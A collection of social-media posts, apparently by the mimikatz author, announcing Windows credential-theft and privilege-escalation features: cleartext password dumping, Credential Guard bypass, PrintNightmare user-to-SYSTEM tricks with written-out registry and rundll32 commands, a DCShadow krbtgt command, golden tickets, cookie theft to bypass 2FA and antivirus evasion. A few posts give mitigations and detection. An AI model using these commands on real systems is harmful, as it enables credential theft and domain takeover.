So
#mimikatz
wanted passwords, and Terminal Server has some for usπ₯
Cleartext passwords *decrypted* on a fully, up to date Windows 2019 Server
No library, no previous code injection, and doesn't use junk part of memoryπ
Ping
@jonasLyk
, still in testing ... π€ͺ
Just released a new
#mimikatz
version to support Windows 10 1803 to bypass the Credential Guard authentication chain
Reminder: your passwords/keys are not in the secure world... only its storage **after** authentication!
@reni_ni
this version is for you π
Do you want to RDP on workstations / servers without limitations on the number of users?
(aka: another admin is already logued on this server)
Patch Terminal Server service with
#mimikatz
, now ready for Windows 10 1803 π
Now in
#mimikatz
π₯,
#mstsc
credentials (passwords / PIN codes) for RDP / Remote Desktop Client
- ts::mstsc - on client credentials
- ts::logonpasswords - on server credentials
Does not rely on previously injected hook/library, useful on jumping servers
>
Little
#printnightmare
(ep 4.3) upgrade : user-to-system as a serviceπ₯
> Open SYSTEM prompt
connect to \\printnightmare[.]gentilkiwi[.]com (remove [ ]) with
- user: .\gentilguest
- password: password
Open 'Kiwi Legit Printer - x64', enjoy SYSTEM
(just one printer this timeπ€ͺ)
Want a quick & dirty (but supported by Microsot) way to avoid
#follina
Office know payloads?
Just disable "Troubleshooting wizards" by GPO
>
HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics - EnableDiagnostics - 0
By CERT
@banquedefrance
This
#printnightmare
/ CVE-2021-1675 is really serious π€ͺ
Just adapted/simplified original POC then:
*From Remote standard user to SYSTEM*
Here on a domain controller, but valid on all systems with RPC to spooler available, remote or local
β‘οΈ disable service now (no patch yet)
A new
#mimikatz
π₯release with
#zerologon
/ CVE-2020-1472 detection, exploit, DCSync support and a lots of love inside β€οΈ
It now uses direct RPC call (fast and supports unauthenticated on Windows)
>
Thank you:
@SecuraBV
I updated
#mimikatz
to support Windows 1809, even the kernel driver! (with my expired certificateπ¬)
Of course, misc::memssp to bypass Credential Guard chain includedπ
(but also, crypto, event log, terminal server...and passwords in clear when enabled!)
>
Gentle reminder: when you delete certificates on Windows, it does not delete associated private keys on the disk...
Take a look in: %appdata%\Microsoft\Crypto\RSA (of all users π)
A gift for forensinc/data recovery, but also for
#mimikatz
and attackers...
yarh- for some reason on win11 the SAM file now is READ for users.
So if you have shadowvolumes enabled you can read the sam file like this:
I dont know the full extent of the issue yet, but its too many to not be a problem I think.
Windows 365 is expensive and without basic security
Did
#mimikatz
dumped my Azure *cleartext* password here? Or my Primary Refresh Token?
It's funny how you don't apply best practices you recommend to the customer to avoid securing by default
>
Using a Local Account, and have Windows Hello PIN code configured? ('cause Microsoft says it's more secure π€·ββοΈ)
Cleartext password is in the SYSTEM vault
TPM or not
#mimikatz
loves your passwords π₯°
Thank you
@tijldeneut
for questions on it (I was too much on PRT π€)
Thanks to
@cube0x0
works (& the damned RpcBindingSetObject function on Windowsπ€¬), a new
#mimikatz
π₯release using MS-PAR protocol instead of MS-RPRN
Now,
#printnightmare
/ CVE-2021-34527 *everywhere*, not only domain controller: servers & workstations
>
Always fabulous to see editors low the Windows Security level
When Citrix SSO is enabled... passwords are stored in *user processes* (in addition to system ones)
Ho yeah, *even if you have Credential Guard*
Yeah, that's what Citrix is calling "SSO"
> Will be in
#mimikatz
3 π₯
#mimikatz
kitten edition ! π
Now supports saved password in RDG files (used with Remote Desktop Connection Manager)
π€·ββοΈ Friends don't let friends save passwords with DPAPI
You know it's ~like cleartext passwords? Especially with domain backup key?
>
By the way,
#mimikatz
bypassing Windows Defender detection (like a lots of other security products) is still simple as being a little bit patient...
1. yep, they catch it without this delay...
2. yep, real time protection & cloud (without submission) are enabled
#printnightmare
- Episode 3
You know that even patched, with default config (or security enforced with
#Microsoft
settings), a standard user can load drivers as SYSTEM?
- Local Privilege Escalation -
#feature
So much fun this morning, a
@Microsoft
signed
#mimikatz
Thank you
@jxy__s
for your research and a such beautiful code
Now, will wait for people to understand that the "source file" can be really another thing than a file on the disk
That's getting ridiculous π
calc.exe (or any other program) detected as
#mimikatz
because of "sekurlsa" arguments π€·ββοΈ
All that NextGen / IA / Cloud / Behavior detection is too much for me π
Q: what can you do when you have
#mimikatz
π₯ & some Read access on Windows system files like SYSTEM, SAM and SECURITY?
A: Local Privilege Escalation π₯³
Thank you
@jonasLyk
for this Read access on default Windowsπ
Do you know how to get cleartext passwords of users, at logon, in a Windows 10?
Especially with Credential Guard enabled?
#mimikatz
-
It's easy as an Authentication Package (mimilib) or a piece of code injected...
That epic Microsoft momentβ€οΈ
#cve20200601
#curveball
Recently worked on
#mimikatz
and ECC, so yes, 10 and 2016/2019 only.
Previous versions like Windows 7 did not support personnal EC curves (only few NIST standard ones)
Hey
@_dirkjan
, I just tested your
#PrivExchange
attack on a 2019 DC with 2019 Exchange (without separated administration at install)
It works like a charm, so much class with this attackπ€ I'm so loving it.
Thank you for your work π and
@agsolino
for
#impacket
too π₯°
I was told you like SCCM passwords &
#mimikatz
π₯
Did you know SCCM *endpoints* can keep credentials of all your Network Access Accounts?
Time to try the new dpapi::sccm command and to check privileges associated to them π
>
I'm sure you want to test
#mimikatz
π₯DCShadow by yourself: (
@mysmartlogon
rocked the code π€)
Eg: lsadump::dcshadow /object:CN=krbtgt,CN=Users,DC=lab,DC=local /attribute:ntPwdHistory /value:00112233445566778899aabbccddeeff000102030405060708090a0b0c0d0e0f
It's time to play with
#mimikatz
π₯&
#kekeo
π€&
#impacket
If you have a Windows PKI with its WebServer, you'll have problemsπ€ͺ
No authentication/credential to *full domain owned*
>
>
π
@topotam77
EFS & PetitPotam
π
@ExAndroidDev
PR
Want to get a usable Kerberos TGT without admin rights/allowtgtsessionkey?
It's easy with a delegation ticket! (enabled by default...)
No special requirement, just some loveπ
>
Thank you
@elad_shamir
(and
@TheColonial
π) for evil ideas!
Dump *domain* (& generic π) Windows credentials from the Credential Manager without admin!
#mimikatz
*needs domain user rights (or user password, of course!)
Something makes me think that a little howto would interest you ...
#mimikatz
is now able to decrypt Credential Guard blobs when you have access to Secure Worlds keys (here a vmem file of VMWare)
>
Thanks to
@FSecureLabs
&
@TimoHirvonen
for dumps & work -- more to come with their (mini)dumping ideas with
#physmem2profit
π
Did you know
#mimikatz
can patch RDP server to allow multiple simultaneous sessions, workstations or servers? π
(because some people do not like the command line π)
New Windows Domain Controller compromission: with
#mimikatz
: set *PREVIOUS* krbtgt keys (here the RC4 one) - and welcome golden tickets !
** Who's auditing setting the previous key ?π€ͺ **
Thank you to
@mysmartlogon
and the god of crypto bugs ! (
#soon
on the release section)
- have NTLM hash of a DC ?
- need computer/server/dc NTLM/RC4 key ?
- ...but affraid to make silver ticket and/or DCSync (detection) ?
Use NT 3.5 protocol against a 2019 DC, because, yes: LEGACY π€·ββοΈ
(so old, but so good: )
Want to block [MS-EFSR] /
#PetitPotam
calls?π€
Use RPC filters ! π₯³
put previous Tweet in a file: `block_efsr.txt` then:
> netsh -f block_efsr.txt
Just tested: it blocks remote connections & not local EFS usage
Thank you to
@CraigKirby
to remind us this RPC technology filter!
I rewrited
#mimikatz
π₯code for
#printnightmare
- less calls (can be in only 1 call, LPE or RCE) ;
- more efficient ;
- mimispool library can be modified to be a real driver ;
- support Windows 7 to Windows 11 (TPM or notπ€ͺ)
>
After few tweakings,
#printnightmare
- Episode 4.1
Now works from any computers, even not domain joined
User to SYSTEM
But I don't understand... Windows 11 with VBS security & TPM 2.0 don't protect me ?π€
Want to test
#printnightmare
(ep 4.x) user-to-system as a service?π₯
(POC only, will write a log file to system32)
connect to \\ with
- user: .\gentilguest
- password: password
Open 'Kiwi Legit Printer - x64', then 'Kiwi Legit Printer - x64 (another one)'
Updated
#printnightmare
flow chart
Yes, LPE is possible under certain circumstances even if disable the Print Spooler service inbound remote printing
#mimikatz
update on its way
I just pushed a new
#mimikatz
release to support Windows 10 1903 (build 18362)
Even the driver (not really well signed - but loadable π) is in the package.
Ho, yes, misc::memssp still work to hook and get passwords π€·ββοΈ
>
Because I had question about "Protected Process" and LSA (RunAsPPL), don't forget that
#mimikatz
driver (mimidriver) can remove the Flags without any reboot or UEFI programπ
And yes, this is also for Windows 10 1903 x64 & x86 π
>
#mimikatz
2 +
#kekeo
2 =
#mimikatz
3π₯
* ASN.1 encode+decode (no more
#kekeo
impossible build)
* Submodules (no more gigantisc misc::)
* VS 2019 Community (no more VS2010/2012 tricks)
* International input/output
* & more... !
Still support Windows XPπ€ͺ
...coding in progressπ
Customers waiting for official Microsoft communication about
#printnightmare
4.x (user to SYSTEM)
"We are investigating and will take appropriate action as needed to help keep customers protected."
Decrypting credentials with
#mimikaz
& DPAPI is fun.
But recreating masterkeys on your own machine to deal with all credentials is cool too.
Especially when you can steal browser sessions and bypass 2FA with user's cookiesπ
>
Want to try to decode SCCM passwords in SC_UserAccount table with
#mimikatz
? π₯
(hints, lots of them have usually admin rights π€ͺ)
A little POC here:
So
@bugch3ck
can try it ;)
I just pushed the first
#mimikatz
version of the year
Support RSA, DSA & EC(DH|DSA) keys:
- export (even when not exportable)
- convert from different format (PVK,blob,PKCS
#8
,PEM,DER,...) to PKCS
#8
- build your PKCS
#12
(pfx) from raw keys & certificates
>
New
#mimikatz
release to test new ts::logonpasswords feature (experimental)π₯
- Only with active users
- Only tested on 2012R2/2016/2019 + some Windows 10 LTSC
>
* Do not hesitate to make some tests
@awakecoding
@jonasLyk
@FuzzySec
@n00py1
etc. π€ͺ
Because it's "easy" to monitor the clipboard content from
#mimikatz
to get sensitive data π (or garbage text)
(not related to Keepass, but you can understand more easily the idea)
Wait
@Microsoft
, are you sure about your new Q/A mechanism in Windows 1803 ?
(at least, password is not stored in cleartext in the vault like in previous versions π)
Test with
#mimikatz
by yourself:
Thanks a lot
@mihi42
( )
Dealing with strings & filenames is hardπ
New function in
#mimikatz
π₯to normalize filenames (bypassing checks by using UNC instead of \\server\share format)
So a RCE (and LPE) with
#printnightmare
on a fully patched server, with Point & Print enabled
>
Would you like to try to dump your
#Windows365
Azure passwords in the Web Interface too?
A new
#mimikatz
π₯release is here to test!
(Remote Desktop client still work, of course!)
>
cc:
@awakecoding
@RyMangan
Ho, by the way,
#curveball
#cve20200601
is not only about TLS & Authenticode... it's also for S/MIME and other signatures.
Yes, it's also valid against
#Outlook
mail signature verification β€οΈ
I hope nobody rely on it for legal / workflow validation
Don't you think
#mimikatz
3 is more sexy with
#kekeo
inside?
Still compatible with Windows XP,
Without custom compiler this time (VS2019+ Community+)
Without commercial ASN1 library
In enterprise environment (domain/user single sign on) you can make some dirty tricks with
#printnightmare
...
reg add "HKCU\Printers\Connections\,,print.lab.local,Kiwi Legit Printer" /f /v Provider /t REG_SZ /d win32spl.dll
Next user logon or spooler refresh, SYSTEM execution
A quick & dirty
#Splunk
search to detect basic
#mimikatz
DCSync with DC security events:
(specify your index!)
Seems to detect normal account, golden & silver ticket usage to DCSync.
One exception: (with the original meme inside π)
But my favorite (for now)
#printnightmare
dirty trick is: *as a standard user* the way to *force* all other users/admins of workstation/server to install printersπ
rundll32 printui,PrintUIEntry /ga /n"\\print.lab.local\Kiwi Legit Printer"
Rpc(Asyn)cAddPerMachineConnection
CredSSP with "Default Credentials Delegation" keeps passwords in client memory, but you must *also* secure the targetπ
Impersonation/Admin/System/Tickets (Golden or not...) lets a standard user (or...) to get its passwordπ€ͺ
Not in
#mimikatz
, try
#kekeo
-
If you get the smartcard of an user,
#mimikatz
can extract its NTLM hash if its authentication is cached...
even offline/without DC interactionπ...
cc:
@agsolino
I did almost forget that
#mimikatz
can run without using the infamous debug privilege...
the default with XP/2003, but also if you're SYSTEM on newer platforms
(like in some Meterpreter sessions π)
Stop thinking removing debug privilege to administrators will stop
#mimikatz
π
Very (very) soon in
#mimikatz
π₯
Client RDP passwords/PIN in MSTSC process, decrypted.
Without previous injection/hook in process, of courseπ
Especially useful on jump serversπ€ͺ
~ Can also be used to debug some internal properties ~
#cve20200601
#curveball
last use case for today
Yes, it's also dangerous for Microsoft VBA macro (especially when you think "Disable all Macros except digitally signed" will protect you)
#printnightmare
- Episode 4
You know what is better than a Legit Kiwi Printer ?
π₯Another Legit Kiwi Printer...π
No prerequiste at all, you even don't need to sign drivers/packageπ€ͺ
#mimikatz
update to support new
@googlechrome
encryption for Credentials & Cookies (AES-256-GCM with a global AES key protected by DPAPI)
(still support the legacy DPAPI too π)
Thank you
@kevinmitnick
&
@riflon
for the reportπ
>
Moaaaar credentials π€ͺ
Thanks to Rory McNamara π₯° ( ) _and a big SQLITE3 lib update_,
#mimikatz
can now open Chrome saved passwords & cookies databases already opened by Chrome (without making a copy of them somewhere..)
Be efficient and use it as is!
>
Official tool 'dpapimig' (and RPC) needs user's SID & password... in some 'test' situations you don't have that password, but maybe:
NTLM hash, SHA1 hash, DPAPI hash, Kerberos ticket, krbtgt, DC$, domain Backup keys...
So many option with
#mimikatz
>
I just pushed a
#mimikatz
update to deal with
#PowerShell
PSCredential & SecureString saved in XML files π¬
You can deal with them in the same ways as other DPAPI blob, local system, rcp, password, hash, domain backup key...
More credentials love π₯°
>
#printnightmare
4.x - lots ofβ€οΈto the printnightmare[.]gentilkiwi[.]com Internet server, but some wanted to have a Lan server.
Legit: many companies don't allow outbound SMB traffic (as some ISP)
> Some PowerShell commands to help: (& new mimispool.dll)
I'm not a hash/password cracker, but some of you are.
For the love of
@tifkin_
,
@harmj0y
and
@hashcat
,
#mimikatz
can now patch LSASS to force NTLM Server challenge to 0x1122334455667788
(still experimental: W7-SP1 and W10-1709 only at this time)